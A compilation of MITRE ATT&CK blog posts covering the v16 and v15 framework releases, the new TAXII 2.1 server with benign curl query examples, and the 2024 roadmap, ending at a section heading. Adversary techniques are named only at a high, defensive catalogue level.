MITRE

V16 Brings (Re)Balance: Restructured Cloud, New Analytics, and More Cybercriminals

In v16, we’re all about balance — striking that perfect chord between familiar and pioneering to keep things real and actionable.

This update fine-tunes how we cover cloud environments, finding equilibrium between depth and practicality to ensure it remains practical for defenders. As part of our balancing act, we’re also expanding on familiar threats while introducing some fresh behaviors and groups. This release also features optimized detection engineering offerings and enhanced usability across ATT&CK tools, with the goal of a balanced resource for everyone.

For all the details on our updates/additions across Techniques, Software, Groups and Campaigns take a look at our release notes, our detailed changelog, or our changelog.json.

Enterprise

Cloud Realigned

We’ve been working to fine-tune the balance between abstraction and detail in the Cloud matrix to cover various cloud environments and threats, while staying specific enough to guide actionable defenses. v16 unveils our efforts to keep the matrix practical for defenders across diverse setups, clarify technique descriptions, and ensure that it’s intuitively navigable.

We’d like to introduce the recalibrated Cloud matrix, now featuring four platforms (Iaas, SaaS, Identity Provider, and Office Suite) — key changes include:

• Broadened Identity concept to cover multiple products and services, reflecting how identity functions work similarly across cloud setups.
  – This includes incorporating Azure AD into Identity Provider for clearer cloud functionality distinctions.
• Clarified the Google Workspace and Microsoft 365 overlap with the new Office Suite platform, as they behave nearly identically at the technique level.

Behavior Balancing Act

We maintained our perfect balance formula (Familiar + Novel = Reality) with this release, expanding on existing techniques with behaviors you’ll recognize, but weren’t previously in the matrix — for example, T1557.004: Adversary-in-the-Middle: Evil Twin, T1213.004: Data from Information Repositories: Customer Relationship Management Software and T1213:Data from Information Repositories: Messaging Applications.

For the novelty factor, this release also features some intriguing new behaviors, like T1496.004:Resource Hijacking:Cloud Service Hijacking, where adversaries can hijack compromised SaaS applications (like email and messaging services) to send spam, while also draining your resources and impacting service availability. We also added T1666: Modify Cloud Resource Hierarchy, highlighting how IaaS hierarchies can be manipulated to evade defenses and exploit resources by creating covert subscriptions in Azure or detaching AWS accounts from their organizations.

Our Linux and macOS behavior repository also grew, with the highly demanded T1546.017: Event Triggered Execution: Udev Rules, where adversaries can persist on Linux by tweaking udev rules to run malicious code, exploiting its permissions and background capabilities. The new T1558.005: Steal or Forge Kerberos Tickets: Ccache Files sub reminds us how adversaries can swipe Kerberos tickets from credential cache files to access multiple services as the current user — and even indulge in a little privilege escalation or lateral movement.

For the full list of (sub) technique additions and expansions, check out the changelog!

What’s Next: We’re looking into a optimizing a couple of disparate areas — including restructuring Defense Evasion for clarity and usability. One approach we’re assessing is to organize techniques based on the specific behaviors they represent: those that focus on evading detection and those aimed at circumventing specific mitigations. We’re also evaluating how to refactor metadata to only feature what’s useable and relevant. Have thoughts or would like to contribute insights to either discussion? Share them on Slack or email!

Defensive Coverage

Detection Engineering

Our Defensive goal for this year was to expand detections and mitigations, and help you get more actionable through detection engineering. With our optimization of our pseudocode format for analytics — reflecting real-world query language that is meant to serve as a template for your tailored queries — v16 is coming in hot with a whole host of new analytic blueprints.

In the Execution, we’ve added 85 new analytics, to help you identify techniques that execute malicious code,120 new analytics under Credential Access aimed at capturing the behaviors used to steal credentials, and 26 new Cloud analytics designed to highlight techniques that exploit Microsoft 365 & Azure AD.

As a bonus, v16 also features a STIX analytic extraction Python script that lets you quickly pull and export analytics.

Mitigations

On the Mitigations front, we added a new mitigation: Out of Band Communication, focused on secure, alternative communication channels — like encrypted messaging or satellite lines — to keep critical comms safe and running during incidents and bypassing any compromised network systems. We also enhanced Active Directory Configuration with a community contribution that adds clearer examples and detailed interpretations of group policy settings. As we continue to update Mitigations, we need your insights! When you share specific use cases, clearer examples, and detailed configurations, you’re making it easier for fellow defenders to understand and implement mitigations effectively.

What’s Next: We have a lot on our docket and some areas we’re still considering, including implementing STIX IDs for data components to improve clarity and tracking, developing analytics for Initial Access and Exfiltration, and Discovery, and revamping our data sources for actionability. We’ll also be looking into multi-event analytics that examine how different sources, like file modifications and process creation, interact within a short time frame instead of focusing on just one collection source. We would love your insights and collaboration on these initiatives — email or join #defensive_attack to get involved!

Cyber Threat Intelligence

Our CTI updates also embody the perfect balance formula: we’re working to close the representation gaps in the cybercrime space while continuing to update state-attributed groups.

Some of the cybercriminal additions in v16 include G1032 (Inc Ransom), a group notorious for its double-extortion tactics, as well as the G1040 (Play) ransomware group, that utilizes advanced encryption and targeting of high-value victims. Both groups exploit known vulnerabilities to gain initial access and steal data before deploying their ransomware. Additionally, G1037 operates as an initial access broker, using phishing techniques to infiltrate networks.

On the State front, we updated G0007 and G0034, both linked to different units of Russia’s General Staff Main Intelligence Directorate (GRU), with common behaviors, such as using malicious Microsoft Office attachments in their spear-phishing emails.

What’s Next: Moving forward, we intend to continue staying responsive to your contributions — highlighting groups, software, and campaigns that matter to practitioners, while also showcasing unique and exceptional tradecraft to highlight techniques. Got brilliant insights or behaviors to share? Join us on #attack-cti, or contribute.

Software Development

Our Software goal this year was to enhance usability and streamline processes for ATT&CK tools and infrastructure. We’ve been working hard towards these goals, but most importantly, we introduced our new TAXII server: the MITRE ATT&CK Workbench TAXII 2.1 Server and open-sourced the TAXII 2.1 code to enable you to establish your own servers within your organization and contribute to enhancing it. As you’re exploring the new 2.1 server, remember that we’ll be retiring the TAXII 2.0 server on December 18. To continue receiving updated ATT&CK data, you’ll need to migrate from cti-taxii.mitre.org to attack-taxii.mitre.org. Check out our TAXII 2.1 blog post for more details.

What’s Next: We’re planning on rolling out ATT&CK Data Model 1.0, which will introduce Platform objects and assign ATT&CK IDs to data components for easier tracking. We’ll also be updating the defensive objects structure for intuitiveness and simplifying the Workbench process. On the website front, our goal is to move towards a modern framework and ensure consistency and clarity across ATT&CK tools and documentation with STIX 2.1.

You Bring the Insights, We’ll Bring the Updates

We deeply value our community, and your in-the-wild examples and real-world implementations are what ensure that ATT&CK remains relevant and actionable, so if you see something, contrib something.

Looking ahead, we can’t wait to keep partnering with you on everything we have lined up — as well as all the things we haven’t planned yet but will absolutely end up on our agenda, thanks to your great contributions.

Connect with us on Email, Twitter, LinkedIn, or Slack.

©2024 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 24–00779–4.

---

v16 Cloud Rebalancing, Analytics, was originally published in MITRE ATT&CK® on Medium, where people are continuing the conversation by highlighting and responding to this story.

As mentioned in our 2024 Roadmap and the v15 release blog, we’re excited to introduce our new TAXII server and the latest addition to the ATT&CK Workbench software suite: the MITRE ATT&CK Workbench TAXII 2.1 Server. We’ve open-sourced the TAXII 2.1 code on GitHub, allowing you to set up your own servers within your organization and contribute to its improvement.

While you’re diving into the new 2.1 server, don’t forget: our TAXII 2.0 server is retiring on December 18.

To continue receiving updated ATT&CK data, you’ll need to migrate from cti-taxii.mitre.org to attack-taxii.mitre.org. However, this migration may involve more than just a URL change. Given the transition from STIX 2.0 to STIX 2.1, the complexity of your migration will depend on how deeply your applications are integrated with STIX 2.0. We recommend assessing the impact on your systems and planning your migration accordingly.

Getting Started with TAXII 2.1

Ready to explore the MITRE ATT&CK Workbench TAXII 2.1 server?

• Visit our GitHub repository for the source code and detailed usage documentation.
• Leverage the ATT&CK Workbench Deployment repository with Docker Compose templates to simplify setting up Workbench services and the TAXII 2.1 module (so you can pull the Docker images from GitHub and get started without building from source!).
• Skip the source code and pull the TAXII 2.1 Docker image directly from the GitHub Container Registry.
• Access the server Swagger interface and Bruno API Client definitions (Bruno, similar to Postman, provides an easy way to interact with REST APIs). You can find our Bruno files here.
• Familiarize yourself with the OASIS TAXII 2.1 specification to enhance your integration prowess.
• Experience issues? Submit specific requests or encounter issues on GitHub.

Why TAXII 2.1?

We know the ATT&CK community has relied on our public TAXII 2.0 server, but it had issues like frequent outages. The TAXII 2.1 server addresses these problems with a more reliable and smooth experience. It’s built for scalability and stress-tested with real-world benchmarks from TAXII 2.0, ensuring you’re less likely to face major outages. Additionally, the new server introduces pagination, which was missing in TAXII 2.0. This means you can fetch smaller chunks of data instead of the entire ~20 MB STIX collection, speeding up the process and reducing data transfer costs.

A critical update to note is that our TAXII 2.1 server will exclusively host STIX 2.1 content moving forward. This change is part of our long-term strategy to shift away from STIX 2.0, aligning with the latest standards.

The new TAXII 2.1 server is also more powerful and capable than the previous version. We designed it to smoothly integrate with Workbench, making CTI management as seamless as possible. If you’re already using the ATT&CK Workbench in your CTI workflows, you can easily edit and maintain CTI data without needing additional tools. The TAXII 2.1 server integrates with the ATT&CK Workbench software suite, and can automatically synch with the Workbench REST API (the Workbench “back end”).

Workbench users can add objects, STIX collections, and bundles, and the TAXII 2.1 server will automatically make them available via its REST API. You don’t need to change your editor workflows — just bring the TAXII 2.1 server online in your Workbench container stack, and it will sync every 30 minutes by default (administrators can adjust this if needed). TAXII 2.1 is also optional, and you can continue using Workbench as usual without it.

Of note, the TAXII 2.1 specification outlines two “sharing models” for TAXII server implementations:

• The Collection model, where the TAXII server allows producers to host a set of CTI data that can be requested by consumers: TAXII Clients and Servers exchange information in a request-response model.
• The Channel model, where the TAXII server uses the publish-subscribe pattern to allow producers to push data to many consumers and consumers to receive data from many producers.

Given that Channels are still loosely defined in the TAXII specification, we decided to only implement the Collections model outlined in the TAXII 2.1 specification. However, we are open to adding support for a pub-sub model in future releases.

A Brief Guide to Accessing Threat Intelligence Data

With the new TAXII 2.1 server, you can still access your cyber threat intel in STIX format through the publicly accessible REST API, just like its predecessor (cti-taxii.mitre.org) that’s been around for over 6 years. Even though this server has some sophisticated functionality, querying it is actually pretty simple. This following guide will show you the basics and help you easily get the threat intelligence data you need.

With TAXII 2.1 running on a RESTful API model and using standard HTTP requests, you can connect to the server using any HTTP client you like. This includes popular tools like curl, wget, httpie, or Postman. This flexibility allows you to seamlessly integrate TAXII 2.1 queries into your existing workflows and tools.

Let’s dive into how to structure these requests and interpret the responses.

Importantly, all TAXII 2.1 requests require a special Accept header:

GET /taxii2/ HTTP/1.1 Accept: application/taxii+json;version=2.1 Host: attack-taxii.mitre.org

Here is an example of setting the Accept header using the curl tool:

curl --request GET 
  --url https://attack-taxii.mitre.org/taxii2/ 
  --header ‘Accept: application/taxii+json;version=2.1’

The request above sends a request to the TAXII server’s Discovery endpoint, which returns a list of available API roots that the TAXII server offers. Each API Root is the “root” URL of that particular instance of the TAXII API. Our TAXII server only hosts one API Root, which we can see clearly from the response body:

{ 
  "title": "MITRE ATT&CK TAXII 2.1", 
  "description": "This API Root contains TAXII 2.1 REST API endpoints that serve MITRE ATT&CK STIX 2.1 data", 
  "default": "api/v21", 
  "api_roots": [ 
    "api/v21" 
  ] 
} 

Great! Now that we have the API Root, let’s see if we can query for a list of available TAXII Collections:

curl --request GET   
    --url https://attack-taxii.mitre.org/api/v21/collections/   
    --header 'Accept: application/taxii+json;version=2.1' 

The response should look something like the following:

{
  “collections”: [
    {
      “id”: “x-mitre-collection — 1f5f1533-f617–4ca8–9ab4–6a02367fa019”,
      “title”: “Enterprise ATT&CK”,
      “description”: “ATT&CK for Enterprise provides a knowledge base of real-world adversary behavior targeting traditional enterprise networks. ATT&CK for Enterprise covers the following platforms: Windows, macOS, Linux, PRE, Office 365, Google Workspace, IaaS, Network, and Containers.”,
      “canRead”: true,
      “canWrite”: false,
      “mediaTypes”: [
        “application/taxii+json;version=2.1”,
        “application/taxii+json”
      ]
    },
    {
      id”: “x-mitre-collection — 90c00720–636b-4485-b342–8751d232bf09”,
      “title”: “ICS ATT&CK”,
      …
    },
    {
      “id”: “x-mitre-collection — dac0d2d7–8653–445c-9bff-82f934c1e858”,
      “title”: “Mobile ATT&CK”,
      …
    }
  ]
}

The response lists three objects that match the main ATT&CK domains: Enterprise, Mobile, and ICS. Of note, TAXII Collections and STIX Collections are different concepts — with TAXII Collections operating as versatile containers for CTI objects. For our MITRE ATT&CK TAXII server, we’ve mapped each TAXII Collection directly to an ATT&CK domain. This means querying a TAXII Collection from our server provides data from just one domain, simplifying the user experience and aligning with the ATT&CK framework. While this mapping isn’t required by the TAXII protocol and other servers may organize collections differently, we chose this method to make our server more intuitive for the ATT&CK community.

Now that we have our API Root and the available TAXII Collections, we’re ready to retrieve some CTI objects:

curl --request GET 
  --url 'https://attack-taxii.mitre.org/api/v21/collections/x-mitre-collection--dac0d2d7-8653-445c-9bff-82f934c1e858/objects?limit=100' 
  --header ‘Accept: application/taxii+json;version=2.1’

This request sends a request for the first 100 objects from the Enterprise ATT&CK collection. The response should look something like this:

{
  “more”: true,
  “next”: “1”,
  “objects”: [←100 →]
}

If the ‘more’ property is set to true and the ‘next’ property is populated, then the client can paginate through the remaining records using the ‘next’ URL parameter along with the same original query options. So, we can request the second page of 100 objects by simply adding the ‘next=1’ query parameter to the original request:

curl --request GET   
    --url 'https://attack-taxii.mitre.org/api/v21/collections/x-mitre-collection--dac0d2d7-8653-445c-9bff-82f934c1e858/objects?limit=100&next=1'   
    --header 'Accept: application/taxii+json;version=2.1' 

What’s Next for ATT&CK Workbench TAXII 2.1

We believe the release of the MITRE ATT&CK Workbench TAXII 2.1 server is a big step forward for threat intelligence sharing — and we have even more exciting integrations on our roadmap to make the TAXII experience even smoother:

• Workbench UI indicators that signal whether an object or collection is actively being shared through TAXII;
• Workbench UI toggles that allow users to pause (or enable) the sharing objects and collections with TAXII;
• Workbench role-based access controls (RBAC) for TAXII administration.

Stay tuned for more updates and enhancements as we continue to evolve our tools!

©2024 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 24–00195–2.

---

Introducing TAXII 2.1 and a fond farewell to the TAXII 2.0 Server was originally published in MITRE ATT&CK® on Medium, where people are continuing the conversation by highlighting and responding to this story.

ATT&CK v15 Brings the Action: Upgraded Detections, New Analytic Format, & Cross-Domain Adversary Insights

v15 is all about actionability and bringing defenders’ reality into focus — we prioritized what you need to detect, and how you can do it more effectively with detection engineering upgrades, and deeper intelligence insights across platforms. This release also reflects the new expansion rhythm, balancing both well-known and emerging behaviors to reflect how trends and activity are experienced in the field.

For the details on our updates/additions across Techniques, Software, Groups and Campaigns take a look at our release notes, our detailed changelog, or our changelog.json.

Enterprise | Familiar + Novel = Reality

With v15 we were aiming for the perfect balance of familiar behaviors you’ve probably seen countless times (e.g., T1027.013: Obfuscated Files or Information: Encrypted/ Encoded File, T1665: Hide Infrastructure), as well as newer, emerging trends. The shadowy domain of Resource Development was expanded to illuminate how adversaries are using generative artificial intelligence tools, like large language models (LLMs), to support various malicious activities (T1588.007: Obtain Capabilities: Artificial Intelligence). And it’s not just about gaining initial access anymore — we added T1584.008: Compromise Infrastructure: Network Devices to capture how threat groups are hacking into third-party network devices, including small office/home office routers, to use these devices to facilitate further targeting.

Cloud | More Actionability

As outlined in the ATT&CK 2024 Roadmap, we’re striving to make the Cloud matrix more approachable for defenders of all skill levels. With this release, we focused on providing a broader set of defensive measures, resources, and insights for CI/CD pipelines, Infrastructure as Code (IaC), and Identity. v15 features new mitigations and data sources on token protection, along with more specific references to Okta logs. T1072: Software Deployment Tools was expanded to include broad execution of T1651: Cloud Administration Command, reflecting how threat actors are turning cloud native tools like AWS Systems Manager into remote access trojans.

We ramped up resources for CI/CD pipelines and IaC, and made some refinements to Identity, with the expansion of T1484: Domain Policy Modification to include not just Azure AD, but also other identity-as-a-service providers like Okta. T1556: Modify Authentication Process gained a new sub (T1556.009: Conditional Access Policies) exploring how threat actors have tampered with or disabled conditional access policies for ongoing access to compromised accounts. We also expanded T1136.003: Create Account: Cloud Account with additional service account insights.

What’s Next: v16 will feature robust identity and detection updates, as well as the platform rebalancing operations, where we’re focusing on covering a wider range of cloud environments and threats, while making it more intuitive to prioritize techniques relevant to a specific platform.

Defensive Coverage | Upgrading, Converting & Restructuring Defensive Measures

You’ll find expanded detections in v15 to assist your detection engineering. Previously, we structured our analytics in a pseudo format that was consistent with the Cyber Analytic Repository (CAR). In some cases this was hard to understand.

In v15, we transformed that format into a real-world query language style (like Splunk) that is compatible with various security tools. These upgrades are featured in detections across the framework including some techniques within the Execution tactic.

Our aim with these upgrades, is to reflect the data source itself is the data you should be collecting, and to provide an understandable format that pairs well with every day defender tools (i.e. SIEMs and Sensors).

We have also synced up some mitigations within the parent to sub-technique relationship. Our team has analyzed a list of sub-techniques that had mitigations that the parent technique did not have. In v15, you will find some parent techniques now reflect what mitigations are seen in the sub-technique.

What’s Next: As we gear up for October, we’ll be completing the Execution detections, refining Credential Access detections, diving into Cloud analytics, and restructuring our data sources for better accessibility.

ICS | Cross-Domain Campaigns

We’ve been working to retrofit major incidents in the ICS space to improve understanding and showcase how ICS and enterprise techniques intersect in each event. V15 illuminates some of the ICS-Enterprise integration efforts, with the release of four cross-mapped campaigns:

· Starting with Triton, the Safety Instrumented System attack of 2017 that shook the petrochemical industry to its core.

· Then there’s C0032, a campaign spanning various utilities from 2014 to 2017, often grouped with the petrochemical incident but distinctly different in nature.

· Next up, Unitronics, a spree that zeroed-in on specific devices and impacted utilities and organizations worldwide. This campaign saw adversaries disrupting device interfaces to make them unusable for end users.

· Fast forward to 2022 Ukraine Electric Power, where we witnessed a glimpse into the future of ICS attacks, with hypervisor features and shared domain access exploited to infiltrate ICS systems and unleash havoc. The campaign highlights key considerations regarding hypervisor usage across multiple domains, and the abuse of native features in vendor software.

2022 Ukraine also spawned two new ICS techniques that are featured in this release: T0895: Autorun Image and T0894:System Binary Proxy Execution via vendor application binaries.

What’s Next: v16 will launch ICS sub-techniques, along with a structured cross-walk to enable mapping between deprecated and new techniques. We’ll also be releasing new asset coverage and updates on our exploration into incorporating more sectors into the ICS matrix.

Mobile | New Techniques, Software, Groups & Mitigations

With help from our community, this release incorporates new techniques, including — exploiting software vulnerabilities for initial access and adversaries performing active and automated discovery for the lowdown on your network setup — and incorporated fresh software and groups. We also added a new mitigation to the Mobile matrix, M1059 Do Not Mitigate (for Mobile) as a sneak peek to the new mitigations that will be added in future releases. This release also features the first Mobile campaign, C0033, associated with PROMETHIUM (G0056). The group primarily targets Windows devices, however, recent reporting and external contributions demonstrated a shift to mobile exploitation on Android and iOS devices.

We added in Mobile techniques to existing Groups and Software to illuminate the shift to include mobile exploitation. This includes building out the APT-C-23 (G1028) profile, mirroring this South American threat group’s targeting of Android and iOS devices, and recording how BITTER (G1002) has distributed malicious apps via SMS, WhatsApp, and various social media platforms.

What’s Next: In the coming months, we’ll be rolling out more structured detections, and boosting proactivity across Mobile by evaluating incorporation of pre-intrusion techniques, like active and passive reconnaissance, and acquiring or developing resources for targeting.

Cyber Threat Intelligence | More Cybercriminal, Underrepresented Groups

We’re working towards better reflecting the threat landscape by infusing the framework with more cybercriminal and underreported adversary activity. This release showcases new cybercriminal operations and highlights Malteiro, a criminal group believed to be based in Brazil. They are known for operating and distributing the Mispadu/URSA banking trojan through a malware-as-a-service model. Banking trojans, a notorious threat in Latin America, are increasingly spreading their chaos across borders, courtesy of malware developers selling tools to overseas operators. Malteiro’s operations exemplify this targeting shift, evident in a recent campaign affecting European entities across various sectors.

What’s Next: We’ll continue conducting thorough assessments of Groups, Software, and Campaigns to up the framework realism quotient and provide clearer insights into adversary activities. We’re also teaming up with ATT&CK domain leads to expand coverage of cross-domain intrusions.

Software Dev | TAXII 2.1, FTW

We’ve been working towards our goals of enhancing Navigator’s usability and streamlining processes for ATT&CK Workbench. Most importantly, we’re taking our TAXII server to new heights, and by December 18, we’ll be retiring the TAXII 2.0 server and transitioning to the upgraded TAXII 2.1 version. You can locate the documentation for the TAXII 2.1 server in our GitHub repository.

What’s Next: We’ll be continuing to enhance usability on ATT&CK Workbench and Navigator, and building towards swifter Groups and Software releases. Mark your calendars to update the URLs for TAXII 2.1 clients to connect to https://attack-taxii.mitre.org instead of https://cti-taxii.mitre.org!

In Conclusion | Field Reports, Benefactors

We’re always on the lookout for field reports and insights from those of you on the ground. Your observations play a crucial role in improving ATT&CK’s tactical utility — so remember, if you see something, contrib something. Curious about how a contribution becomes a technique? Check out our video that walks you through the process.

If you’re interested in contributing to ATT&CK’s overall autonomy, flexibility, and free services, you can find more details on our Benefactor page. We are deeply grateful to our initial cohort of benefactors, SOC Prime, Tidal Cyber, and Zimperium, for their generous support.

©2024 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 24–00779–3.

---

ATT&CK v15 Brings the Action was originally published in MITRE ATT&CK® on Medium, where people are continuing the conversation by highlighting and responding to this story.

Enhancing usability, expanding scope, optimizing defenses

2023 was dynamic year for ATT&CK. We marked a decade of progress since the framework’s inception and achieved some key milestones to make ATT&CK more accessible for a wider community. Our scope (slightly) expanded to encompass activities adjacent to direct Enterprise interactions, such as non-technical, deceptive practices and social engineering techniques (Financial Theft, Impersonation, and Spearphishing Voice). We enhanced detection capabilities with integrated notes, pseudocode from CAR, and BZAR-based analytics. The ICS matrix welcomed the addition of Assets to enhance inter-sector communication and mapping. We rolled out Mobile-specific data sources, structured detections, and behaviors like smishing, quishing, and vishing. Website navigation was improved, along with a faster Search bar, and updates that hit you faster than you can say “resources/changelog.html”. We also maintained a steady cadence of updates and new content from the ATT&CK team and external contributors.

In October, we successfully held ATT&CKcon 4.0, with new insights shared and realistic applications demonstrated by practitioners. And finally, we kickstarted the ATT&CK Benefactor program.

2024 Roadmap: Vision & Goals

Since launching ATT&CK, we’ve been humbled to witness how the community has integrated it across widely varied spheres and around the globe. The vision for ATT&CK has always been to enable the broadest use across the widest spectrum of stakeholders — whether you’re cross-mapping between domains, annotating and developing tailored Navigator layers, or using the framework as a blueprint to build multi-platform threat models. ATT&CK was designed to empower defenders precisely where they need it most. This is the core thesis for ATT&CK, and as its stewards, we’ll continue prioritizing measures that advance a more inclusive, relevant, and actionable framework.

In line with this vision, our 2024 goals are to bolster broader usability and enhance actionable defensive measures for practitioners across every domain. This includes exploring scope adjustments and platform rebalancing, as well as implementing structural modifications with the introduction of ICS sub-techniques. A core focus will be reinforcing defensive mechanisms and optimizing their user-friendliness. We’ll be bridging Linux and macOS information gaps and enhancing prominent adversary representation. The ATT&CK Navigator, Workbench, and website will feature reengineering to improve accessibility and enable swifter ATT&CK Group/Software/Campaign updates. We’ll also be sunsetting the TAXII 2.0 server by December 18 in favor of the upgraded TAXII 2.1 version. Finally, we’ll continue amplifying the key driver behind ATT&CK — community collaboration. This includes hosting ATT&CKcon 5.0 in October, and maintaining support for the European Union (EU) and Asia-Pacific (APAC) ATT&CK Community Workshops.

Enterprise | Integrated Defense

In tune with ATT&CK’s vision, we’re continuously re-evaluating Enterprise’s scope to more accurately reflect the threats faced by real defenders. Matrices and platforms are conceptual schematics, not real-world structures, and we’re assessing realignments, expansions, and refinements of platforms to represent interconnected organizations, the adversaries they encounter, and the reality of defenders. Our goal is to advance a cohesive and integrated framework that provides more functional use cases and empowers users to visualize and create adaptable defenses against cross-platform threats.

Cloud | Matrix Balance & More Actionability

Our Cloud goal this year is to enable defenders (both new and seasoned) to better leverage the Cloud matrix for defensive action. This includes focusing on emerging and significant threats to the domain, upgrading Cloud analytics, and optimizing the balance between generalization and detail in the matrix.

With a considerable portion of cloud identities retaining super admin access, and the frequency of identity-related intrusions across the domain, we’ve been reinforcing and creating more detailed techniques for identity-based attacks. We’ll also be diving into the exploitation of Continuous Integration/Continuous Deployment (CI/CD) pipelines and the malicious use of Infrastructure as Code (IaC). Our Cloud analytics effort will elevate your actionability, by outlining the steps to detect specific behaviors, and providing additional context on what to find and collect.

We’ll also be evaluating how to best refine the balance between abstraction and specificity in the matrix. Our exploration will assess if the platforms are broad enough to cover a wide range of cloud environments and threats, yet specific enough to inform defensive actions. This balance is crucial for the matrix to remain practical and useful for defenders operating in diverse cloud environments. Our aim is to make navigating the Cloud matrix more intuitive and enable users to prioritize techniques relevant to their specific platform.

Ready to navigate the Cloud with us? Sail over to #cloud_attack.

macOS/Linux | Countermeasures for Priv Esc and Defense Evasion

Our goal for Linux and macOS is to equip practitioners with more robust countermeasures and help bridge the information gap on defending these systems. We’ll continue tracking down in-the-wild adversary behaviors and building more macOS and Linux-only (sub)techniques to optimize defensive arsenals. For Linux we’ll be exploring privilege escalation and defense evasion to better align with in-the-wild adversary activity. On the macOS side, we’ll be strategically bolstering the platform, with a particular emphasis on threats associated with elevated permissions.

If you have intelligence or technique ideas, we would love to collaborate. We rely on the practitioners who work with these systems day-in and day-out to help us identify gaps and provide invaluable insights. Ready to contribute? email us and join our #linux_attack or #macos_attack slack channel.

Defensive Coverage | Upgrading, Converting & Restructuring Defensive Measures

Our Defensive goal this year is to expand detections and mitigations to help you better optimize your detection engineering — and maybe get a little more actionable. The April release will include both new and updated mitigations that incorporate best practices from contributors, and industry standards meticulously mapped by our defense team.

Over the past few months, we’ve also been examining analytic language approaches. Our aim? Transforming detection logic into formats compatible with different security tools, including more consistent with real-world query languages such as Splunk . This will simplify the process of aligning your SIEM data with ATT&CK detections, making it easier to understand. We’re also incorporating data collection sources for a given detection query. For example, pulling information from Windows Event logs or Sysmon and the associated Event Code. The new analytic style in ATT&CK will overhal the previously used CAR-like pseudocode, and will be the model for future analytics. This will enhance compatibility across various environments and help you hunt threats more efficiently.

Lately, we’ve been prioritizing improving detections under the Execution tactic, where some of the most employed techniques fall. v15 will showcase a subset of these enhanced detections, featuring the trifecta of CAR (Cyber Analytics Repository) pseudocode, BZAR-based analytics (Bro/Zeek ATT&CK-based Analytics and Reporting) and detection notes.

Gearing up for October, we’ll be completing the enhanced detections for Execution, sculpting out Credential Access detections, exploring the universe of Cloud analytics, and navigating how to restructure our data sources for improved accessibility. This means sprucing up data source definitions and matching them to everyday use cases like sensor mappings. This way, you can more easily identify the tools and events that clue you in on shady activity. Additionally, you can opt for the data sources that best align with your specific needs. The revamp will also include the introduction of STIX IDs for data components, making it more intuitive to reference and integrate data sources.

Join our ranks at #defensive_attack channel.

ICS | Subs, Asset Expansion, & Cross-Domain Integration

ICS is leveling up this year. Our goals include broadening ICS horizons with new asset coverage, exploring platform scope expansion, and continuing our multi-domain integration quest. We’ll also be diving deeper into adversary behaviors with the introduction of sub-techniques. v15 will showcase some of integration efforts, with the release of cross-mapped campaigns. These campaigns track IT to OT attack sequences, helping defenders better understand multi-domain intrusions and informing unified defense strategies across technology environments.

The October release will feature a structural shake-up, with the first tranche of the long-awaited sub-techniques. Like Enterprise and Mobile sub-techniques, ICS subs will break down techniques into more detail. This increased granularity allows defenders to understand the nuances of adversaries’ execution of a given technique, enhancing their ability to detect and mitigate them. The technique restructuring will involve modifying the name and scope of techniques and integrating them more effectively with other domains. This integration will foster a more comprehensive defensive approach on both the right and left of launch. You can expect a subs crosswalk to help you understand our decisions and how things map between deprecated and new techniques.

October will also include some additional treats with Asset coverage expansion, building upon the Asset refactoring in v14. The refactoring strived to provide a clearer picture of the devices, systems, or platforms a specific technique could target and introduced the concept of Related Assets. Related Assets links cross-sector Assets that share similar functions, capabilities, and architectural locations/properties, highlighting that they may also be susceptible to the same techniques. v16 will feature additional Related Assets, as well as more in-depth definitions and refined mappings of technique relationships for different devices and systems. You can start leveraging Assets for your defensive activities by viewing the technique mappings from Asset pages, or by reviewing Asset mappings from a technique page. We’ll also be scouting how to incorporate additional sectors such as such as maritime, rail, and electric.

We welcome input from all sectors on how to improve identification of key assets and any additional adversary behaviors you have observed in the wild. Reach out to us at [email protected] or #ics_attack

Mobile | Detections & Mitigations Optimization + PRE Exploration

Mobile’s goal is to dial up the pre-and-post-compromise defensive measures this year, with a detections and mitigations upgrade and an exploratory mission into pre-intrusion behaviors for the matrix. We introduced Mobile structured detections in v14 and will continue building out structured detections as well as expanding our mitigations across the matrix. For optimal actionability, we’ll be leveraging the best practices and tangible experiences from the mobile security community.

In the coming months we’ll also be evaluating how to enhance inter-domain connectivity across platforms and exploring integrating proactive tactics into the Mobile matrix. Our goal is to better reflect evolving adversary activity targeting the domain. This research quest will examine adversary actions before attacks, like active and passive Reconnaissance, and acquiring or developing resources for targeting purposes.

Collaboration and knowledge-sharing with the community will to be a driver for Mobile’s development in 2024. In addition to ramping up detections and mitigations, we’re particularly interested in partnering with mobile defenders to examine potential areas where communications platforms or domains could be added into ATT&CK. If you’re interested, connect via [email protected] or join #mobile_attack.

Software Development | Enhanced Usability & Streamlined Workflows

Our Software goals this year are to increase usability across ATT&CK Workbench and Navigator, and streamline Groups and Software releases. Adversaries evolve quickly, so we’re optimizing Workbench workflows to harmonize Group and Software releases more closely to their cadence. This includes developing enhanced search capabilities, improving ATT&CK object-collection association, and overhauling the Collection Manager UI for the ATT&CK Workbench. These renovations will fine-tune the approval of ATT&CK object changes and the matching of collection bundle differences with official ATT&CK changelog types, resulting in swifter releases.

For ATT&CK Navigator, we’re refining the user experience, and the experience of anyone reading your reports. We’ll be upgrading SVG export function for sleeker output designs, providing smoother navigation with intuitive export controls, and rolling out an in-website tutorial for mastery of all the key features. We’ll also be updating the official content source to the STIX 2.1 repository — making everything a little more robust and flexible.

Finally, we’re taking our TAXII server to the next level! We’ll be sunsetting the TAXII 2.0 server by December 18, as we transition to the upgraded TAXII 2.1 version. You can access the documentation for TAXII 2.1 server in our GitHub repository. Remember to switch URLs for TAXII 2.1 clients to connect to https://attack-taxii.mitre.org instead of https://cti-taxii.mitre.org. And get ready to experience enhanced features and smoother operations.

Cyber Threat Intelligence | More Cybercriminal, Underrepresented Groups

With CTI, our mission is to better reflect the reality of the threat landscape by infusing more cybercriminal and underreported adversary activity into the framework. By bridging gaps in representation and minimizing those unknowns, we aim to provide defenders with better insights and tools to counter a wider array of threats. A pivotal aspect of this effort includes gap assessments of Groups, Software, and Campaigns. These evaluations will help us pinpoint any disparities between the current content and the reality of adversary activities.

Our releases this year will feature more cybercriminal operations and under-monitored regions, including Latin America, offering a more nuanced understanding of global threats. We’re also collaborating with ATT&CK domain leads to expand coverage of cross-domain intrusions to inform a more unified approach to undermining adversaries.

To join this quest, engage at [email protected]

Community Collaboration

ATT&CK Community Workshops | Practitioner-led Forums for Activating ATT&CK

